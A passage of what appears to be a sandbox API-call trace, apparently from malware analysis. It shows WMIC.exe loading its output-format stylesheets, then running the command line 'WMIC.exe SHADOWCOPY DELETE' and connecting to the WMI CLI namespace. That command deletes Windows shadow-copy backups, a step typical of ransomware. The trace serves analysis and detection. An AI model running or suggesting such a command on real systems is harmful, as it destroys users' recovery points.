(param_1="texttablewsys") returned 0xd [0098.274] SysStringLen (param_1="XML") returned 0x3 [0098.274] SysStringLen (param_1="texttablewsys") returned 0xd [0098.274] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.274] SysStringLen (param_1="XML") returned 0x3 [0098.274] SysStringLen (param_1="texttablewsys") returned 0xd [0098.274] malloc (_Size=0x30) returned 0x288300 [0098.274] IUnknown:Release (This=0x216bd50) returned 0x0 [0098.274] IUnknown:Release (This=0x21678d0) returned 0x0 [0098.274] IUnknown:Release (This=0x216a280) returned 0x0 [0098.274] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=11, listItem=0x1cfa10 | out: listItem=0x1cfa10*=0x216bd50) returned 0x0 [0098.274] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x1cfa20 | out: text=0x1cfa20*="texttable.xsl") returned 0x0 [0098.274] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x1cfa18 | out: attributeMap=0x1cfa18*=0x21678d0) returned 0x0 [0098.275] malloc (_Size=0x18) returned 0x28bad0 [0098.275] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x1cfa28 | out: namedItem=0x1cfa28*=0x216a280) returned 0x0 [0098.275] free (_Block=0x28bad0) [0098.275] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x1cfa60 | out: value=0x1cfa60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x2)) returned 0x0 [0098.275] malloc (_Size=0x18) returned 0x28bad0 [0098.275] malloc (_Size=0x18) returned 0x28baf0 [0098.275] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0098.275] SysStringLen (param_1="TABLE") returned 0x5 [0098.275] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0098.275] SysStringLen (param_1="XML") returned 0x3 [0098.275] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0098.275] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.275] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.275] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0098.275] malloc (_Size=0x30) returned 0x288340 [0098.275] IUnknown:Release (This=0x216bd50) returned 0x0 [0098.275] IUnknown:Release (This=0x21678d0) returned 0x0 [0098.275] IUnknown:Release (This=0x216a280) returned 0x0 [0098.275] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=12, listItem=0x1cfa10 | out: listItem=0x1cfa10*=0x216bd50) returned 0x0 [0098.276] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x1cfa20 | out: text=0x1cfa20*="texttable.xsl") returned 0x0 [0098.276] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x1cfa18 | out: attributeMap=0x1cfa18*=0x21678d0) returned 0x0 [0098.276] malloc (_Size=0x18) returned 0x28bb10 [0098.276] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x1cfa28 | out: namedItem=0x1cfa28*=0x216a280) returned 0x0 [0098.276] free (_Block=0x28bb10) [0098.276] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x1cfa60 | out: value=0x1cfa60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x2)) returned 0x0 [0098.276] malloc (_Size=0x18) returned 0x28bb10 [0098.276] malloc (_Size=0x18) returned 0x28bb30 [0098.276] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0098.276] SysStringLen (param_1="TABLE") returned 0x5 [0098.276] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0098.276] SysStringLen (param_1="XML") returned 0x3 [0098.276] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0098.276] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.277] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0098.277] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0098.277] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.277] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0098.277] malloc (_Size=0x30) returned 0x288380 [0098.277] IUnknown:Release (This=0x216bd50) returned 0x0 [0098.277] IUnknown:Release (This=0x21678d0) returned 0x0 [0098.277] IUnknown:Release (This=0x216a280) returned 0x0 [0098.277] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=13, listItem=0x1cfa10 | out: listItem=0x1cfa10*=0x216bd50) returned 0x0 [0098.277] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x1cfa20 | out: text=0x1cfa20*="texttable.xsl") returned 0x0 [0098.277] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x1cfa18 | out: attributeMap=0x1cfa18*=0x21678d0) returned 0x0 [0098.277] malloc (_Size=0x18) returned 0x28bb50 [0098.277] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x1cfa28 | out: namedItem=0x1cfa28*=0x216a280) returned 0x0 [0098.277] free (_Block=0x28bb50) [0098.277] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x1cfa60 | out: value=0x1cfa60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x2)) returned 0x0 [0098.278] malloc (_Size=0x18) returned 0x28bb50 [0098.278] malloc (_Size=0x18) returned 0x28bb70 [0098.278] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0098.278] SysStringLen (param_1="TABLE") returned 0x5 [0098.278] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0098.278] SysStringLen (param_1="XML") returned 0x3 [0098.278] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0098.278] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.278] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0098.278] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0098.278] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0098.278] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0098.278] malloc (_Size=0x30) returned 0x2883c0 [0098.278] IUnknown:Release (This=0x216bd50) returned 0x0 [0098.278] IUnknown:Release (This=0x21678d0) returned 0x0 [0098.278] IUnknown:Release (This=0x216a280) returned 0x0 [0098.278] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=14, listItem=0x1cfa10 | out: listItem=0x1cfa10*=0x216bd50) returned 0x0 [0098.278] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x1cfa20 | out: text=0x1cfa20*="texttable.xsl") returned 0x0 [0098.278] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x1cfa18 | out: attributeMap=0x1cfa18*=0x21678d0) returned 0x0 [0098.279] malloc (_Size=0x18) returned 0x28bb90 [0098.279] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x1cfa28 | out: namedItem=0x1cfa28*=0x216a280) returned 0x0 [0098.279] free (_Block=0x28bb90) [0098.279] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x1cfa60 | out: value=0x1cfa60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x2)) returned 0x0 [0098.279] malloc (_Size=0x18) returned 0x28bb90 [0098.279] malloc (_Size=0x18) returned 0x28bbb0 [0098.279] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0098.279] SysStringLen (param_1="TABLE") returned 0x5 [0098.279] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0098.279] SysStringLen (param_1="XML") returned 0x3 [0098.279] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0098.280] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.280] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0098.280] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0098.280] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0098.280] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0098.280] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0098.280] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0098.280] malloc (_Size=0x30) returned 0x288400 [0098.280] IUnknown:Release (This=0x216bd50) returned 0x0 [0098.280] IUnknown:Release (This=0x21678d0) returned 0x0 [0098.280] IUnknown:Release (This=0x216a280) returned 0x0 [0098.280] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=15, listItem=0x1cfa10 | out: listItem=0x1cfa10*=0x216bd50) returned 0x0 [0098.280] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x1cfa20 | out: text=0x1cfa20*="htable.xsl") returned 0x0 [0098.280] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x1cfa18 | out: attributeMap=0x1cfa18*=0x21678d0) returned 0x0 [0098.280] malloc (_Size=0x18) returned 0x28bbd0 [0098.281] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x1cfa28 | out: namedItem=0x1cfa28*=0x216a280) returned 0x0 [0098.281] free (_Block=0x28bbd0) [0098.281] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x1cfa60 | out: value=0x1cfa60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x2)) returned 0x0 [0098.281] malloc (_Size=0x18) returned 0x28bbd0 [0098.281] malloc (_Size=0x18) returned 0x28bbf0 [0098.281] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0098.281] SysStringLen (param_1="TABLE") returned 0x5 [0098.281] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0098.281] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.281] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0098.281] SysStringLen (param_1="XML") returned 0x3 [0098.281] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0098.281] SysStringLen (param_1="texttablewsys") returned 0xd [0098.282] SysStringLen (param_1="XML") returned 0x3 [0098.282] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0098.282] malloc (_Size=0x30) returned 0x288440 [0098.282] IUnknown:Release (This=0x216bd50) returned 0x0 [0098.282] IUnknown:Release (This=0x21678d0) returned 0x0 [0098.282] IUnknown:Release (This=0x216a280) returned 0x0 [0098.282] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=16, listItem=0x1cfa10 | out: listItem=0x1cfa10*=0x216bd50) returned 0x0 [0098.282] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x1cfa20 | out: text=0x1cfa20*="htable.xsl") returned 0x0 [0098.282] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x1cfa18 | out: attributeMap=0x1cfa18*=0x21678d0) returned 0x0 [0098.282] malloc (_Size=0x18) returned 0x28bc10 [0098.282] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x1cfa28 | out: namedItem=0x1cfa28*=0x216a280) returned 0x0 [0098.282] free (_Block=0x28bc10) [0098.282] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x1cfa60 | out: value=0x1cfa60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x2)) returned 0x0 [0098.282] malloc (_Size=0x18) returned 0x28bc10 [0098.282] malloc (_Size=0x18) returned 0x28bc30 [0098.283] SysStringLen (param_1="htable-sortby") returned 0xd [0098.283] SysStringLen (param_1="TABLE") returned 0x5 [0098.283] SysStringLen (param_1="htable-sortby") returned 0xd [0098.283] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.283] SysStringLen (param_1="htable-sortby") returned 0xd [0098.283] SysStringLen (param_1="XML") returned 0x3 [0098.283] SysStringLen (param_1="htable-sortby") returned 0xd [0098.283] SysStringLen (param_1="texttablewsys") returned 0xd [0098.283] SysStringLen (param_1="htable-sortby") returned 0xd [0098.283] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0098.283] SysStringLen (param_1="XML") returned 0x3 [0098.283] SysStringLen (param_1="htable-sortby") returned 0xd [0098.283] malloc (_Size=0x30) returned 0x288480 [0098.283] IUnknown:Release (This=0x216bd50) returned 0x0 [0098.283] IUnknown:Release (This=0x21678d0) returned 0x0 [0098.283] IUnknown:Release (This=0x216a280) returned 0x0 [0098.283] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=17, listItem=0x1cfa10 | out: listItem=0x1cfa10*=0x216bd50) returned 0x0 [0098.283] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x1cfa20 | out: text=0x1cfa20*="mof.xsl") returned 0x0 [0098.283] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x1cfa18 | out: attributeMap=0x1cfa18*=0x21678d0) returned 0x0 [0098.283] malloc (_Size=0x18) returned 0x28bc50 [0098.284] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x1cfa28 | out: namedItem=0x1cfa28*=0x216a280) returned 0x0 [0098.284] free (_Block=0x28bc50) [0098.284] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x1cfa60 | out: value=0x1cfa60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x2)) returned 0x0 [0098.284] malloc (_Size=0x18) returned 0x28bc50 [0098.284] malloc (_Size=0x18) returned 0x28bc70 [0098.284] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0098.284] SysStringLen (param_1="TABLE") returned 0x5 [0098.284] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0098.284] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.284] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0098.284] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0098.284] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0098.284] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0098.284] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.284] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0098.284] malloc (_Size=0x30) returned 0x2884c0 [0098.285] IUnknown:Release (This=0x216bd50) returned 0x0 [0098.285] IUnknown:Release (This=0x21678d0) returned 0x0 [0098.285] IUnknown:Release (This=0x216a280) returned 0x0 [0098.285] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=18, listItem=0x1cfa10 | out: listItem=0x1cfa10*=0x216bd50) returned 0x0 [0098.285] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x1cfa20 | out: text=0x1cfa20*="mof.xsl") returned 0x0 [0098.285] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x1cfa18 | out: attributeMap=0x1cfa18*=0x21678d0) returned 0x0 [0098.285] malloc (_Size=0x18) returned 0x28bc90 [0098.285] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x1cfa28 | out: namedItem=0x1cfa28*=0x216a280) returned 0x0 [0098.285] free (_Block=0x28bc90) [0098.286] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x1cfa60 | out: value=0x1cfa60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x2)) returned 0x0 [0098.286] malloc (_Size=0x18) returned 0x28bc90 [0098.286] malloc (_Size=0x18) returned 0x28bcb0 [0098.286] SysStringLen (param_1="wmiclimofformat") returned 0xf [0098.286] SysStringLen (param_1="TABLE") returned 0x5 [0098.286] SysStringLen (param_1="wmiclimofformat") returned 0xf [0098.286] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.286] SysStringLen (param_1="wmiclimofformat") returned 0xf [0098.286] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0098.286] SysStringLen (param_1="wmiclimofformat") returned 0xf [0098.286] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0098.286] SysStringLen (param_1="wmiclimofformat") returned 0xf [0098.286] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0098.286] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.286] SysStringLen (param_1="wmiclimofformat") returned 0xf [0098.286] malloc (_Size=0x30) returned 0x288500 [0098.286] IUnknown:Release (This=0x216bd50) returned 0x0 [0098.286] IUnknown:Release (This=0x21678d0) returned 0x0 [0098.286] IUnknown:Release (This=0x216a280) returned 0x0 [0098.286] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=19, listItem=0x1cfa10 | out: listItem=0x1cfa10*=0x216bd50) returned 0x0 [0098.287] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x1cfa20 | out: text=0x1cfa20*="textvaluelist.xsl") returned 0x0 [0098.287] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x1cfa18 | out: attributeMap=0x1cfa18*=0x21678d0) returned 0x0 [0098.287] malloc (_Size=0x18) returned 0x28bcd0 [0098.287] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x1cfa28 | out: namedItem=0x1cfa28*=0x216a280) returned 0x0 [0098.287] free (_Block=0x28bcd0) [0098.287] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x1cfa60 | out: value=0x1cfa60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x2)) returned 0x0 [0098.287] malloc (_Size=0x18) returned 0x28bcd0 [0098.287] malloc (_Size=0x18) returned 0x28bcf0 [0098.287] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0098.287] SysStringLen (param_1="TABLE") returned 0x5 [0098.287] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0098.288] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.288] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0098.288] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0098.288] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0098.288] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0098.288] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0098.288] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0098.288] malloc (_Size=0x30) returned 0x288540 [0098.288] IUnknown:Release (This=0x216bd50) returned 0x0 [0098.288] IUnknown:Release (This=0x21678d0) returned 0x0 [0098.288] IUnknown:Release (This=0x216a280) returned 0x0 [0098.288] IXMLDOMNodeList:get_item (in: This=0x2169cc0, index=20, listItem=0x1cfa10 | out: listItem=0x1cfa10*=0x216bd50) returned 0x0 [0098.288] IXMLDOMNode:get_text (in: This=0x216bd50, text=0x1cfa20 | out: text=0x1cfa20*="textvaluelist.xsl") returned 0x0 [0098.288] IXMLDOMNode:get_attributes (in: This=0x216bd50, attributeMap=0x1cfa18 | out: attributeMap=0x1cfa18*=0x21678d0) returned 0x0 [0098.288] malloc (_Size=0x18) returned 0x28bd10 [0098.289] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21678d0, name="KEYWORD", namedItem=0x1cfa28 | out: namedItem=0x1cfa28*=0x216a280) returned 0x0 [0098.289] free (_Block=0x28bd10) [0098.289] IXMLDOMNode:get_nodeValue (in: This=0x216a280, value=0x1cfa60 | out: value=0x1cfa60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x2)) returned 0x0 [0098.289] malloc (_Size=0x18) returned 0x28bd10 [0098.289] malloc (_Size=0x18) returned 0x28bd30 [0098.289] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0098.289] SysStringLen (param_1="TABLE") returned 0x5 [0098.289] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0098.289] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0098.289] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0098.289] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0098.289] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0098.289] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0098.289] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0098.289] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0098.289] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0098.289] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0098.289] malloc (_Size=0x30) returned 0x288580 [0098.289] IUnknown:Release (This=0x216bd50) returned 0x0 [0098.289] IUnknown:Release (This=0x21678d0) returned 0x0 [0098.289] IUnknown:Release (This=0x216a280) returned 0x0 [0098.290] IUnknown:Release (This=0x2169cc0) returned 0x0 [0098.290] FreeThreadedDOMDocument:IUnknown:Release (This=0x216bc50) returned 0x1 [0098.290] FreeThreadedDOMDocument:IUnknown:Release (This=0x21671d0) returned 0x0 [0098.290] free (_Block=0x288ff0) [0098.290] GetCommandLineW () returned="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" SHADOWCOPY DELETE" [0098.291] malloc (_Size=0x70) returned 0x288fd0 [0098.291] memcpy_s (in: _Destination=0x288fd0, _DestinationSize=0x6e, _Source=0x2c25ee, _SourceSize=0x6c | out: _Destination=0x288fd0) returned 0x0 [0098.291] malloc (_Size=0x18) returned 0x28bd50 [0098.291] malloc (_Size=0x18) returned 0x28bd70 [0098.292] malloc (_Size=0x18) returned 0x28bd90 [0098.292] malloc (_Size=0x18) returned 0x28bdb0 [0098.292] malloc (_Size=0x80) returned 0x28cb60 [0098.292] GetLocalTime (in: lpSystemTime=0x1cfbd0 | out: lpSystemTime=0x1cfbd0*(wYear=0x7e4, wMonth=0x5, wDayOfWeek=0x5, wDay=0x8, wHour=0x14, wMinute=0x25, wSecond=0xc, wMilliseconds=0xaa)) [0098.292] _vsnwprintf (in: _Buffer=0x28cb60, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x1cfb28 | out: _Buffer="05-08-2020T20:37:12") returned 19 [0098.292] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0098.292] malloc (_Size=0x28) returned 0x286fa0 [0098.292] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0098.292] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0098.292] malloc (_Size=0x28) returned 0x289050 [0098.292] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0098.292] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0098.292] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0098.292] malloc (_Size=0x16) returned 0x28bdd0 [0098.292] lstrlenW (lpString="SHADOWCOPY") returned 10 [0098.292] _wcsicmp (_String1="SHADOWCOPY", _String2="\"NULL\"") returned 81 [0098.292] malloc (_Size=0x16) returned 0x28bdf0 [0098.292] malloc (_Size=0x8) returned 0x289080 [0098.292] free (_Block=0x0) [0098.292] free (_Block=0x28bdd0) [0098.292] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0098.292] malloc (_Size=0xe) returned 0x28bdd0 [0098.292] lstrlenW (lpString="DELETE") returned 6 [0098.292] _wcsicmp (_String1="DELETE", _String2="\"NULL\"") returned 66 [0098.293] malloc (_Size=0xe) returned 0x28be10 [0098.293] malloc (_Size=0x10) returned 0x28be30 [0098.293] memmove_s (in: _Destination=0x28be30, _DestinationSize=0x8, _Source=0x289080, _SourceSize=0x8 | out: _Destination=0x28be30) returned 0x0 [0098.293] free (_Block=0x289080) [0098.293] free (_Block=0x0) [0098.293] free (_Block=0x28bdd0) [0098.293] malloc (_Size=0x10) returned 0x28bdd0 [0098.293] lstrlenW (lpString="QUIT") returned 4 [0098.293] lstrlenW (lpString="SHADOWCOPY") returned 10 [0098.293] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0098.293] lstrlenW (lpString="EXIT") returned 4 [0098.293] lstrlenW (lpString="SHADOWCOPY") returned 10 [0098.293] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0098.293] free (_Block=0x28bdd0) [0098.293] WbemLocator:IUnknown:AddRef (This=0x1da1390) returned 0x2 [0098.293] malloc (_Size=0x10) returned 0x28bdd0 [0098.293] lstrlenW (lpString="/") returned 1 [0098.293] lstrlenW (lpString="SHADOWCOPY") returned 10 [0098.293] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0098.293] lstrlenW (lpString="-") returned 1 [0098.293] lstrlenW (lpString="SHADOWCOPY") returned 10 [0098.293] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0098.294] lstrlenW (lpString="CLASS") returned 5 [0098.294] lstrlenW (lpString="SHADOWCOPY") returned 10 [0098.294] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0098.294] lstrlenW (lpString="PATH") returned 4 [0098.294] lstrlenW (lpString="SHADOWCOPY") returned 10 [0098.294] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0098.294] lstrlenW (lpString="CONTEXT") returned 7 [0098.294] lstrlenW (lpString="SHADOWCOPY") returned 10 [0098.294] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0098.294] lstrlenW (lpString="SHADOWCOPY") returned 10 [0098.294] malloc (_Size=0x16) returned 0x28be50 [0098.294] lstrlenW (lpString="SHADOWCOPY") returned 10 [0098.295] GetCurrentThreadId () returned 0xb10 [0098.295] ??0CHString@@QEAA@XZ () returned 0x1cf9e0 [0098.295] malloc (_Size=0x18) returned 0x28be70 [0098.295] malloc (_Size=0x18) returned 0x28be90 [0098.295] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1da1390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff1d2998 | out: ppNamespace=0xff1d2998*=0x1db3a98) returned 0x0 [0109.305] free (_Block=0x28be90) [0109.305] free (_Block=0x28be70) [0109.305] CoSetProxyBlanket (pProxy=0x1db3a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0109.306] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0109.307] GetCurrentThreadId () returned 0xb10 [0109.307] ??0CHString@@QEAA@XZ () returned 0x1cf878 [0109.307] malloc (_Size=0x18) returned 0x28be70 [0109.307] malloc (_Size=0x18) returned 0x28be90 [0109.307] malloc (_Size=0x18) returned 0x28beb0 [0109.307] malloc (_Size=0x18) returned 0x28bed0 [0109.307] SysStringLen (param_1="root\\cli") returned 0x8 [0109.307] SysStringLen (param_1="\\") returned 0x1 [0109.307] malloc (_Size=0x18) returned 0x28bef0 [0109.307] SysStringLen (param_1="root\\cli\\") returned 0x9 [0109.307] SysStringLen (param_1="ms_409") returned 0x6 [0109.307] free (_Block=0x28bed0) [0109.307] free (_Block=0x28beb0) [0109.307] free (_Block=0x28be90) [0109.307] free (_Block=0x28be70) [0109.307] malloc (_Size=0x18) returned 0x28be70 [0109.307] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1da1390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff1d29a0 | out: ppNamespace=0xff1d29a0*=0x1db3b28) returned 0x0 [0109.320] free (_Block=0x28be70) [0109.320] free (_Block=0x28bef0) [0109.320] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0109.320] GetCurrentThreadId () returned 0xb10 [0109.320] ??0CHString@@QEAA@XZ () returned 0x1cf9f0 [0109.320] malloc (_Size=0x18) returned 0x28bef0 [0109.321] malloc (_Size=0x18) returned 0x28be70 [0109.321] malloc (_Size=0x18) returned 0x28be90 [0109.321] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0109.321] malloc (_Size=0x3a) returned 0x28cbf0 [0109.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff161980, cbMultiByte=-1, lpWideCharStr=0x28cbf0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0109.321] free (_Block=0x28cbf0) [0109.321] malloc (_Size=0x18) returned 0x28beb0 [0109.321] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0109.321] SysStringLen (param_1="SHADOWCOPY") returned 0xa [0109.321] malloc (_Size=0x18) returned 0x28bed0 [0109.321] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SHADOWCOPY") returned 0x26 [0109.321] SysStringLen (param_1="'") returned 